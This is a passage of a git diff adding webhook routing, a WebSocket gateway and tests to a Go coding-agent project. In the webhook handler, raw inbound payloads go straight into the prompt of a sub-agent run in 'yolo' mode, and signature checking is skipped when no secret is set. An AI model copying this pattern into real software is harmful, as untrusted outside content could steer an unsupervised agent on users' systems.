+			UserID:       s.UserID,
+			WorkDir:      s.WorkDir,
+			Mode:         s.Mode,
+			MessageCount: len(msgs),
+			LastActive:   s.LastUsed,
+			Preview:      preview,
+		})
+	}
+	return result
+}
+
+func (a *wsDispatcherAdapter) RemoveSession(key string) {
+	a.d.RemoveSession(key)
+}
+
+func (a *wsDispatcherAdapter) ResolveApproval(approvalID string, approved bool) bool {
+	return a.d.ResolveApproval(approvalID, approved)
+}
diff --git a/internal/hermes/webhook/router.go b/internal/hermes/webhook/router.go
new file mode 100644
index 0000000..9ea23b5
--- /dev/null
+++ b/internal/hermes/webhook/router.go
@@ -0,0 +1,168 @@
+// Package webhook implements inbound webhook routing for Hermes mode.
+// External services (GitHub, CI, etc.) POST events to /webhook/<path>,
+// which are verified and dispatched to agent tasks.
+package webhook
+
+import (
+	"context"
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/hex"
+	"encoding/json"
+	"io"
+	"log"
+	"net/http"
+	"strings"
+)
+
+// RouteConfig defines a webhook route.
+type RouteConfig struct {
+	Path           string   `json:"path"`
+	Events         []string `json:"events"`
+	Skill          string   `json:"skill"`
+	Delivery       string   `json:"delivery"`                  // "wechat", "feishu", or "" (no delivery)
+	DeliveryTarget string   `json:"delivery_target,omitempty"` // platform-specific recipient id
+}
+
+// Handler processes incoming webhook events.
+type Handler interface {
+	HandleWebhookEvent(ctx context.Context, route RouteConfig, payload []byte) error
+}
+
+// Router manages webhook routes and dispatches events.
+type Router struct {
+	routes  []RouteConfig
+	secret  string
+	handler Handler
+}
+
+// NewRouter creates a webhook router.
+func NewRouter(routes []RouteConfig, secret string, handler Handler) *Router {
+	return &Router{
+		routes:  routes,
+		secret:  secret,
+		handler: handler,
+	}
+}
+
+// ServeHTTP handles incoming webhook requests.
+// Expected path: /webhook/<route-path>
+func (r *Router) ServeHTTP(w http.ResponseWriter, req *http.Request) {
+	if req.Method != http.MethodPost {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	// Extract the route path from URL
+	path := strings.TrimPrefix(req.URL.Path, "/webhook")
+	if path == "" {
+		path = "/"
+	}
+
+	// Find matching route
+	var route *RouteConfig
+	for i := range r.routes {
+		if r.routes[i].Path == path {
+			route = &r.routes[i]
+			break
+		}
+	}
+	if route == nil {
+		http.Error(w, "no route for path: "+path, http.StatusNotFound)
+		return
+	}
+
+	// Read body
+	body, err := io.ReadAll(io.LimitReader(req.Body, 10*1024*1024)) // 10MB limit
+	if err != nil {
+		http.Error(w, "read body error", http.StatusBadRequest)
+		return
+	}
+
+	// Verify signature if secret is configured
+	if r.secret != "" {
+		sig := req.Header.Get("X-Hub-Signature-256")
+		if sig == "" {
+			sig = req.Header.Get("X-Signature-256")
+		}
+		if !r.verifySignature(body, sig) {
+			http.Error(w, "invalid signature", http.StatusUnauthorized)
+			return
+		}
+	}
+
+	// Check event type filter
+	eventType := req.Header.Get("X-GitHub-Event")
+	if eventType == "" {
+		// Try to extract from body
+		var generic struct {
+			Action string `json:"action"`
+			Type   string `json:"type"`
+		}
+		json.Unmarshal(body, &generic)
+		if generic.Action != "" {
+			eventType = generic.Action
+		} else if generic.Type != "" {
+			eventType = generic.Type
+		}
+	}
+
+	if !routeMatchesEvent(route.Events, eventType) {
+		// Event type not in filter — acknowledge but skip
+		writeJSON(w, http.StatusOK, map[string]string{"status": "skipped", "reason": "event type not matched"})
+		return
+	}
+
+	// Dispatch to handler
+	log.Printf("[webhook] Received event on %s (type: %s, %d bytes)", path, eventType, len(body))
+
+	if r.handler != nil {
+		go func() {
+			if err := r.handler.HandleWebhookEvent(context.Background(), *route, body); err != nil {
+				log.Printf("[webhook] Handler error for %s: %v", path, err)
+			}
+		}()
+	}
+
+	writeJSON(w, http.StatusOK, map[string]string{"status": "accepted"})
+}
+
+// verifySignature verifies HMAC-SHA256 signature.
+func (r *Router) verifySignature(body []byte, signature string) bool {
+	if signature == "" {
+		return false
+	}
+
+	// Strip "sha256=" prefix
+	sig := strings.TrimPrefix(signature, "sha256=")
+
+	mac := hmac.New(sha256.New, []byte(r.secret))
+	mac.Write(body)
+	expected := hex.EncodeToString(mac.Sum(nil))
+
+	return hmac.Equal([]byte(sig), []byte(expected))
+}
+
+func writeJSON(w http.ResponseWriter, status int, v any) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	json.NewEncoder(w).Encode(v)
+}
+
+func routeMatchesEvent(events []string, eventType string) bool {
+	if len(events) == 0 {
+		return true
+	}
+	for _, ev := range events {
+		if ev == "*" {
+			return true
+		}
+		if eventType != "" && ev == eventType {
+			return true
+		}
+	}
+	return false
+}
+
+// Ensure Router satisfies http.Handler.
+var _ http.Handler = (*Router)(nil)
diff --git a/internal/hermes/webhook/router_test.go b/internal/hermes/webhook/router_test.go
new file mode 100644
index 0000000..1227495
--- /dev/null
+++ b/internal/hermes/webhook/router_test.go
@@ -0,0 +1,320 @@
+package webhook
+
+import (
+	"bytes"
+	"context"
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/hex"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"sync"
+	"testing"
+	"time"
+)
+
+func TestNewRouter(t *testing.T) {
+	routes := []RouteConfig{
+		{Path: "/github", Events: []string{"push", "pull_request"}, Skill: "code-review", Delivery: "wechat"},
+	}
+	handler := &mockHandler{}
+	router := NewRouter(routes, "secret123", handler)
+
+	if router == nil {
+		t.Fatal("expected router")
+	}
+}
+
+func TestRouterServeHTTPNoRoute(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{}, "", handler)
+
+	req := httptest.NewRequest("POST", "/webhook/unknown", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusNotFound {
+		t.Errorf("expected 404, got %d", w.Code)
+	}
+}
+
+func TestRouterServeHTTPMethodNotAllowed(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push"}},
+	}, "", handler)
+
+	req := httptest.NewRequest("GET", "/webhook/github", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w.Code)
+	}
+}
+
+func TestRouterServeHTTPMatchRoute(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push", "pull_request"}},
+	}, "", handler)
+
+	body := `{"action": "push"}`
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader([]byte(body)))
+	req.Header.Set("X-GitHub-Event", "push")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called")
+	}
+}
+
+func TestRouterServeHTTPEventFilter(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push"}},
+	}, "", handler)
+
+	body := `{"action": "issues"}`
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader([]byte(body)))
+	req.Header.Set("X-GitHub-Event", "issues")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if handler.called {
+		t.Error("expected handler NOT to be called (event filtered)")
+	}
+}
+
+func TestRouterServeHTTPWildcardEvent(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/ci", Events: []string{"*"}},
+	}, "", handler)
+
+	body := `{"type": "build"}`
+	req := httptest.NewRequest("POST", "/webhook/ci", bytes.NewReader([]byte(body)))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called (wildcard)")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called (wildcard)")
+	}
+}
+
+func TestRouterServeHTTPRejectsUnknownEventType(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push"}},
+	}, "", handler)
+
+	body := `{"repository": {"name": "repo"}}`
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader([]byte(body)))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected 200, got %d", w.Code)
+	}
+	var resp map[string]string
+	if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode response: %v", err)
+	}
+	if resp["status"] != "skipped" {
+		t.Fatalf("expected skipped response, got %#v", resp)
+	}
+	if handler.waitCalled(t) {
+		t.Fatal("expected handler not to be called for unknown event type")
+	}
+}
+
+func TestRouterSignatureVerification(t *testing.T) {
+	secret := "test-secret"
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, secret, handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	// Compute correct signature
+	mac := hmac.New(sha256.New, []byte(secret))
+	mac.Write(body)
+	sig := "sha256=" + hex.EncodeToString(mac.Sum(nil))
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	req.Header.Set("X-Hub-Signature-256", sig)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called with valid signature")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called with valid signature")
+	}
+}
+
+func TestRouterSignatureVerificationInvalid(t *testing.T) {
+	secret := "test-secret"
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, secret, handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	req.Header.Set("X-Hub-Signature-256", "sha256=invalid")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+	if handler.called {
+		t.Error("expected handler NOT to be called with invalid signature")
+	}
+}
+
+func TestRouterSignatureVerificationMissing(t *testing.T) {
+	secret := "test-secret"
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, secret, handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+}
+
+func TestRouterNoSecret(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, "", handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called (no secret)")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called (no secret)")
+	}
+}
+
+func TestVerifySignature(t *testing.T) {
+	router := &Router{secret: "test"}
+
+	body := []byte("hello")
+	mac := hmac.New(sha256.New, []byte("test"))
+	mac.Write(body)
+	validSig := "sha256=" + hex.EncodeToString(mac.Sum(nil))
+
+	if !router.verifySignature(body, validSig) {
+		t.Error("expected valid signature")
+	}
+
+	if router.verifySignature(body, "sha256=invalid") {
+		t.Error("expected invalid signature")
+	}
+
+	if router.verifySignature(body, "") {
+		t.Error("expected empty signature to fail")
+	}
+}
+
+func TestWriteJSON(t *testing.T) {
+	w := httptest.NewRecorder()
+	writeJSON(w, http.StatusOK, map[string]string{"status": "ok"})
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	contentType := w.Header().Get("Content-Type")
+	if contentType != "application/json" {
+		t.Errorf("expected application/json, got %s", contentType)
+	}
+
+	var result map[string]string
+	json.NewDecoder(w.Body).Decode(&result)
+	if result["status"] != "ok" {
+		t.Errorf("expected ok, got %s", result["status"])
+	}
+}
+
+type mockHandler struct {
+	mu        sync.Mutex
+	called    bool
+	lastRoute RouteConfig
+	calledCh  chan struct{}
+}
+
+func (h *mockHandler) HandleWebhookEvent(ctx context.Context, route RouteConfig, payload []byte) error {
+	h.mu.Lock()
+	h.called = true
+	h.lastRoute = route
+	if h.calledCh == nil {
+		h.calledCh = make(chan struct{})
+	}
+	close(h.calledCh)
+	h.mu.Unlock()
+	return nil
+}
+
+func (h *mockHandler) waitCalled(t *testing.T) bool {
+	t.Helper()
+	h.mu.Lock()
+	ch := h.calledCh
+	if h.called {
+		h.mu.Unlock()
+		return true
+	}
+	if ch == nil {
+		ch = make(chan struct{})
+		h.calledCh = ch
+	}
+	h.mu.Unlock()
+	select {
+	case <-ch:
+		return true
+	case <-time.After(time.Second):
+		return false
+	}
+}
diff --git a/internal/hermes/webhook_handler.go b/internal/hermes/webhook_handler.go
new file mode 100644
index 0000000..e792a3f
--- /dev/null
+++ b/internal/hermes/webhook_handler.go
@@ -0,0 +1,95 @@
+package hermes
+
+import (
+	"context"
+	"fmt"
+	"log"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/hermes/webhook"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+// WebhookHandler implements webhook.Handler by spawning agent tasks.
+type WebhookHandler struct {
+	dispatcher *Dispatcher
+	platforms  map[string]messaging.Platform // platform name → Platform for delivery
+}
+
+// NewWebhookHandler creates a webhook handler that spawns agent tasks.
+func NewWebhookHandler(dispatcher *Dispatcher, platforms map[string]messaging.Platform) *WebhookHandler {
+	return &WebhookHandler{
+		dispatcher: dispatcher,
+		platforms:  platforms,
+	}
+}
+
+// SetPlatforms replaces the platform map. Used to wire platforms after construction.
+func (h *WebhookHandler) SetPlatforms(platforms map[string]messaging.Platform) {
+	h.platforms = platforms
+}
+
+// HandleWebhookEvent processes an incoming webhook event by spawning an agent task.
+func (h *WebhookHandler) HandleWebhookEvent(ctx context.Context, route webhook.RouteConfig, payload []byte) error {
+	if h.dispatcher.agentMgr == nil {
+		return fmt.Errorf("webhook requires --multi-agent mode")
+	}
+
+	// Build prompt from webhook event
+	prompt := fmt.Sprintf("Process this webhook event (route: %s, skill: %s):\n\n%s",
+		route.Path, route.Skill, string(payload))
+
+	// Create a sub-agent to handle the task
+	a, err := h.dispatcher.agentMgr.Create(agent.AgentOptions{
+		Mode:    "yolo",
+		WorkDir: h.dispatcher.cfg.GetWorkDir(),
+	})
+	if err != nil {
+		return fmt.Errorf("create webhook agent: %w", err)
+	}
+
+	// Run agent and collect result
+	ch := a.Run(ctx, prompt)
+	var result string
+	var lastErr error
+	for ev := range ch {
+		if ev.Error != nil {
+			lastErr = ev.Error
+		}
+		// Collect text deltas from the underlying agent loop events
+		if ev.TextDelta != "" {
+			result += ev.TextDelta
+		}
+	}
+
+	// Clean up
+	h.dispatcher.agentMgr.Destroy(a.ID())
+
+	if lastErr != nil {
+		return fmt.Errorf("webhook agent error: %w", lastErr)
+	}
+
+	// Deliver result if configured
+	if route.Delivery != "" && result != "" {
+		h.deliverResult(route.Delivery, route.DeliveryTarget, result)
+	}
+
+	log.Printf("[webhook] Task completed for route %s (result len=%d)", route.Path, len(result))
+	return nil
+}
+
+// deliverResult sends the result to the configured messaging platform.
+func (h *WebhookHandler) deliverResult(platform, target, result string) {
+	p, ok := h.platforms[platform]
+	if !ok {
+		log.Printf("[webhook] Delivery platform %q not found", platform)
+		return
+	}
+	if target == "" {
+		log.Printf("[webhook] Delivery target missing for %s", platform)
+		return
+	}
+	if err := p.SendMessage(context.Background(), target, result); err != nil {
+		log.Printf("[webhook] Delivery error to %s: %v", platform, err)
+	}
+}
diff --git a/internal/hermes/webhook_handler_test.go b/internal/hermes/webhook_handler_test.go
new file mode 100644
index 0000000..f8e1f80
--- /dev/null
+++ b/internal/hermes/webhook_handler_test.go
@@ -0,0 +1,70 @@
+package hermes
+
+import (
+	"context"
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/hermes/webhook"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+func TestWebhookHandlerRequiresMultiAgent(t *testing.T) {
+	d := &Dispatcher{agentMgr: nil}
+	h := NewWebhookHandler(d, nil)
+
+	route := webhook.RouteConfig{Path: "/test", Skill: "test"}
+	err := h.HandleWebhookEvent(nil, route, []byte(`{}`))
+	if err == nil {
+		t.Error("expected error when agentMgr is nil")
+	}
+}
+
+func TestWebhookHandlerDeliverResultUsesTarget(t *testing.T) {
+	platform := &mockPlatform{}
+	h := NewWebhookHandler(nil, map[string]messaging.Platform{
+		"feishu": platform,
+	})
+
+	h.deliverResult("feishu", "chat_123", "done")
+
+	if platform.chatID != "chat_123" {
+		t.Fatalf("chatID = %q, want chat_123", platform.chatID)
+	}
+	if platform.text != "done" {
+		t.Fatalf("text = %q, want done", platform.text)
+	}
+}
+
+func TestWebhookHandlerDeliverResultRequiresTarget(t *testing.T) {
+	platform := &mockPlatform{}
+	h := NewWebhookHandler(nil, map[string]messaging.Platform{
+		"feishu": platform,
+	})
+
+	h.deliverResult("feishu", "", "done")
+
+	if platform.called {
+		t.Fatal("expected SendMessage not to be called without delivery target")
+	}
+}
+
+type mockPlatform struct {
+	called bool
+	chatID string
+	text   string
+}
+
+func (p *mockPlatform) Name() string { return "mock" }
+
+func (p *mockPlatform) Start(ctx context.Context, handler messaging.MessageHandler) error { return nil }
+
+func (p *mockPlatform) Stop() error { return nil }
+
+func (p *mockPlatform) SendMessage(ctx context.Context, chatID string, text string) error {
+	p.called = true
+	p.chatID = chatID
+	p.text = text
+	return nil
+}
+
+func (p *mockPlatform) IsConnected() bool { return true }
diff --git a/internal/hermes/ws/api.go b/internal/hermes/ws/api.go
new file mode 100644
index 0000000..3b83a3b
--- /dev/null
+++ b/internal/hermes/ws/api.go
@@ -0,0 +1,186 @@
+package ws
+
+import (
+	"encoding/json"
+	"net/http"
+	"strings"
+	"time"
+)
+
+// --- HTTP REST API handlers ---
+
+// handleHealth returns server health status (no auth required).
+func (gw *Gateway) handleHealth(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	writeJSON(w, http.StatusOK, map[string]any{
+		"status":         "ok",
+		"version":        gw.version,
+		"uptime_seconds": int(time.Since(gw.startTime).Seconds()),
+	})
+}
+
+// handleStatus returns detailed server status.
+func (gw *Gateway) handleStatus(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	platformProvider := gw.platforms
+	gw.mu.RUnlock()
+
+	sessionCount := 0
+	if dispatcher != nil {
+		sessionCount = len(dispatcher.ListSessions())
+	}
+
+	var platforms []PlatformStatus
+	if platformProvider != nil {
+		platforms = platformProvider.GetPlatformStatuses()
+	}
+
+	writeJSON(w, http.StatusOK, map[string]any{
+		"version":        gw.version,
+		"uptime_seconds": int(time.Since(gw.startTime).Seconds()),
+		"sessions": map[string]int{
+			"active":      sessionCount,
+			"connections": gw.ConnectionCount(),
+		},
+		"platforms": platforms,
+	})
+}
+
+// handleSessions lists or manages sessions.
+func (gw *Gateway) handleSessions(w http.ResponseWriter, r *http.Request) {
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	gw.mu.RUnlock()
+
+	if dispatcher == nil {
+		writeJSON(w, http.StatusServiceUnavailable, map[string]string{"error": "dispatcher not ready"})
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		sessions := dispatcher.ListSessions()
+		writeJSON(w, http.StatusOK, map[string]any{
+			"sessions": sessions,
+		})
+	default:
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+// handleSessionByID handles GET/DELETE for a specific session.
+func (gw *Gateway) handleSessionByID(w http.ResponseWriter, r *http.Request) {
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	gw.mu.RUnlock()
+
+	if dispatcher == nil {
+		writeJSON(w, http.StatusServiceUnavailable, map[string]string{"error": "dispatcher not ready"})
+		return
+	}
+
+	// Extract session ID from path: /api/sessions/{id}
+	path := strings.TrimPrefix(r.URL.Path, "/api/sessions/")
+	if path == "" {
+		writeJSON(w, http.StatusBadRequest, map[string]string{"error": "session ID required"})
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		sessions := dispatcher.ListSessions()
+		for _, s := range sessions {
+			if s.ID == path {
+				writeJSON(w, http.StatusOK, s)
+				return
+			}
+		}
+		writeJSON(w, http.StatusNotFound, map[string]string{"error": "session not found"})
+
+	case http.MethodDelete:
+		dispatcher.RemoveSession(path)
+		writeJSON(w, http.StatusOK, map[string]any{
+			"message": "session deleted",
+			"id":      path,
+		})
+
+	default:
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+// handleMemory handles memory.md read/write.
+func (gw *Gateway) handleMemory(w http.ResponseWriter, r *http.Request) {
+	gw.mu.RLock()
+	memStore := gw.memoryStore
+	gw.mu.RUnlock()
+
+	if memStore == nil {
+		writeJSON(w, http.StatusServiceUnavailable, map[string]string{"error": "memory store not configured"})
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		content, path, source, err := memStore.Read()
+		if err != nil {
+			writeJSON(w, http.StatusInternalServerError, map[string]string{"error": err.Error()})
+			return
+		}
+		writeJSON(w, http.StatusOK, map[string]any{
+			"path":    path,
+			"source":  source,
+			"content": content,
+		})
+
+	case http.MethodPut:
+		var body struct {
+			Content string `json:"content"`
+		}
+		if err := json.NewDecoder(r.Body).Decode(&body); err != nil {
+			writeJSON(w, http.StatusBadRequest, map[string]string{"error": "invalid JSON body"})
+			return
+		}
+		if err := memStore.WriteAll(body.Content); err != nil {
+			writeJSON(w, http.StatusInternalServerError, map[string]string{"error": err.Error()})
+			return
+		}
+		writeJSON(w, http.StatusOK, map[string]string{"message": "memory updated"})
+
+	default:
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+// handlePlatforms returns messaging platform statuses.
+func (gw *Gateway) handlePlatforms(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	gw.mu.RLock()
+	platformProvider := gw.platforms
+	gw.mu.RUnlock()
+
+	var platforms []PlatformStatus
+	if platformProvider != nil {
+		platforms = platformProvider.GetPlatformStatuses()
+	}
+	if platforms == nil {
+		platforms = []PlatformStatus{}
+	}
+
+	writeJSON(w, http.StatusOK, map[string]any{
+		"platforms": platforms,
+	})
+}
diff --git a/internal/hermes/ws/handler.go b/internal/hermes/ws/handler.go
new file mode 100644
index 0000000..132eaa8
--- /dev/null
+++ b/internal/hermes/ws/handler.go
@@ -0,0 +1,235 @@
+package ws
+
+import (
+	"context"
+	"crypto/rand"
+	"encoding/hex"
+	"fmt"
+	"log"
+	"net/http"
+	"sync"
+	"time"
+
+	"golang.org/x/net/websocket"
+)
+
+// WSEvent is the event type sent over WebSocket.
+// Mapped from agent.Event by the dispatcher.
+type WSEvent struct {
+	Type    string `json:"type"`
+	Content string `json:"content,omitempty"`
+
+	// Connected event fields
+	SessionID string `json:"session_id,omitempty"`
+	Version   string `json:"version,omitempty"`
+	Model     string `json:"model,omitempty"`
+	WorkDir   string `json:"work_dir,omitempty"`
+
+	// Tool event fields
+	Tool   string         `json:"tool,omitempty"`
+	CallID string         `json:"call_id,omitempty"`
+	Args   map[string]any `json:"args,omitempty"`
+	Result string         `json:"result,omitempty"`
+
+	// Diff fields
+	Path string `json:"path,omitempty"`
+	Diff string `json:"diff,omitempty"`
+
+	// Approval fields
+	ApprovalID string `json:"approval_id,omitempty"`
+	RiskLevel  string `json:"risk_level,omitempty"`
+	Approved   bool   `json:"approved,omitempty"`
+
+	// Plan fields
+	Plan *PlanData `json:"plan,omitempty"`
+
+	// Usage fields
+	PromptTokens     int `json:"prompt_tokens,omitempty"`
+	CompletionTokens int `json:"completion_tokens,omitempty"`
+	TotalTokens      int `json:"total_tokens,omitempty"`
+	CacheReadTokens  int `json:"cache_read_tokens,omitempty"`
+	CacheWriteTokens int `json:"cache_write_tokens,omitempty"`
+
+	// Done/Error fields
+	StopReason string `json:"stop_reason,omitempty"`
+	Message    string `json:"message,omitempty"`
+	Command    string `json:"command,omitempty"`
+	Error      bool   `json:"error,omitempty"`
+	Code       string `json:"code,omitempty"`
+}
+
+// PlanData represents a task plan for the plan_update event.
+type PlanData struct {
+	Title string     `json:"title"`
+	Steps []PlanStep `json:"steps"`
+}
+
+// PlanStep is a single step in a task plan.
+type PlanStep struct {
+	Title  string `json:"title"`
+	Status string `json:"status"`
+}
+
+// ClientMessage represents a message from the WebSocket client.
+type ClientMessage struct {
+	Type       string `json:"type"`
+	Content    string `json:"content,omitempty"`
+	ApprovalID string `json:"approval_id,omitempty"`
+	Approved   bool   `json:"approved,omitempty"`
+}
+
+// WSConn wraps a WebSocket connection with metadata.
+type WSConn struct {
+	ID     string
+	ws     *websocket.Conn
+	sendMu sync.Mutex
+	closed bool
+	mu     sync.Mutex
+}
+
+// Send sends a WSEvent to the client.
+func (c *WSConn) Send(ev WSEvent) error {
+	c.sendMu.Lock()
+	defer c.sendMu.Unlock()
+	c.mu.Lock()
+	if c.closed {
+		c.mu.Unlock()
+		return nil
+	}
+	c.mu.Unlock()
+	return websocket.JSON.Send(c.ws, ev)
+}
+
+// Close closes the WebSocket connection.
+func (c *WSConn) Close() {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	if !c.closed {
+		c.closed = true
+		c.ws.Close()
+	}
+}
+
+// handleWebSocket handles WebSocket upgrade and message loop.
+func (gw *Gateway) handleWebSocket(w http.ResponseWriter, r *http.Request) {
+	// Auth check
+	if gw.authToken != "" {
+		if !gw.validToken(requestAuthToken(r)) {
+			http.Error(w, "unauthorized", http.StatusUnauthorized)
+			return
+		}
+	}
+
+	handler := websocket.Handler(func(ws *websocket.Conn) {
+		connID := generateConnID()
+		conn := &WSConn{
+			ID: connID,
+			ws: ws,
+		}
+
+		// Register connection
+		gw.connMu.Lock()
+		gw.conns[connID] = conn
+		gw.connMu.Unlock()
+
+		defer func() {
+			conn.Close()
+			gw.connMu.Lock()
+			delete(gw.conns, connID)
+			gw.connMu.Unlock()
+		}()
+
+		// Send connected event
+		conn.Send(WSEvent{
+			Type:      "connected",
+			SessionID: "hermes/ws/" + connID,
+			Version:   gw.version,
+		})
+
+		log.Printf("WebSocket client connected: %s", connID)
+
+		// Message loop
+		for {
+			var msg ClientMessage
+			if err := websocket.JSON.Receive(ws, &msg); err != nil {
+				log.Printf("WebSocket read error (%s): %v", connID, err)
+				return
+			}
+
+			switch msg.Type {
+			case "ping":
+				conn.Send(WSEvent{Type: "pong"})
+
+			case "message", "command":
+				text := msg.Content
+				if msg.Type == "command" && text != "" && text[0] != '/' {
+					text = "/" + text
+				}
+				gw.handleWSChat(r.Context(), conn, connID, text)
+
+			case "approval":
+				if msg.ApprovalID != "" && gw.dispatcher != nil {
+					gw.dispatcher.ResolveApproval(msg.ApprovalID, msg.Approved)
+				}
+				conn.Send(WSEvent{Type: "status", Message: fmt.Sprintf("Approval %s: %v", msg.ApprovalID, msg.Approved)})
+
+			default:
+				conn.Send(WSEvent{
+					Type:    "error",
+					Message: "unknown message type: " + msg.Type,
+				})
+			}
+		}
+	})
+
+	handler.ServeHTTP(w, r)
+}
+
+// handleWSChat dispatches a chat message and streams events back.
+func (gw *Gateway) handleWSChat(ctx context.Context, conn *WSConn, connID, text string) {
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	gw.mu.RUnlock()
+
+	if dispatcher == nil {
+		conn.Send(WSEvent{Type: "error", Message: "dispatcher not ready"})
+		return
+	}
+
+	eventCh := make(chan WSEvent, 100)
+	go func() {
+		defer close(eventCh)
+		if err := dispatcher.HandleWSMessage(ctx, connID, text, eventCh); err != nil {
+			eventCh <- WSEvent{Type: "error", Message: err.Error()}
+		}
+	}()
+
+	for ev := range eventCh {
+		if err := conn.Send(ev); err != nil {
+			log.Printf("WebSocket send error (%s): %v", connID, err)
+			return
+		}
+	}
+}
+
+// generateConnID generates a random connection ID.
+func generateConnID() string {
+	b := make([]byte, 8)
+	rand.Read(b)
+	return hex.EncodeToString(b)
+}
+
+// keepAlive sends periodic pings to keep the connection alive.
+func (c *WSConn) keepAlive(interval time.Duration) {
+	ticker := time.NewTicker(interval)
+	defer ticker.Stop()
+	for range ticker.C {
+		c.mu.Lock()
+		closed := c.closed
+		c.mu.Unlock()
+		if closed {
+			return
+		}
+		c.Send(WSEvent{Type: "pong"})
+	}
+}
diff --git a/internal/hermes/ws/server.go b/internal/hermes/ws/server.go
new file mode 100644
index 0000000..2d4701f
--- /dev/null
+++ b/internal/hermes/ws/server.go
@@ -0,0 +1,201 @@
+// Package ws implements the WebSocket + HTTP gateway for Hermes mode.
+package ws
+
+import (
+	"context"
+	"crypto/subtle"
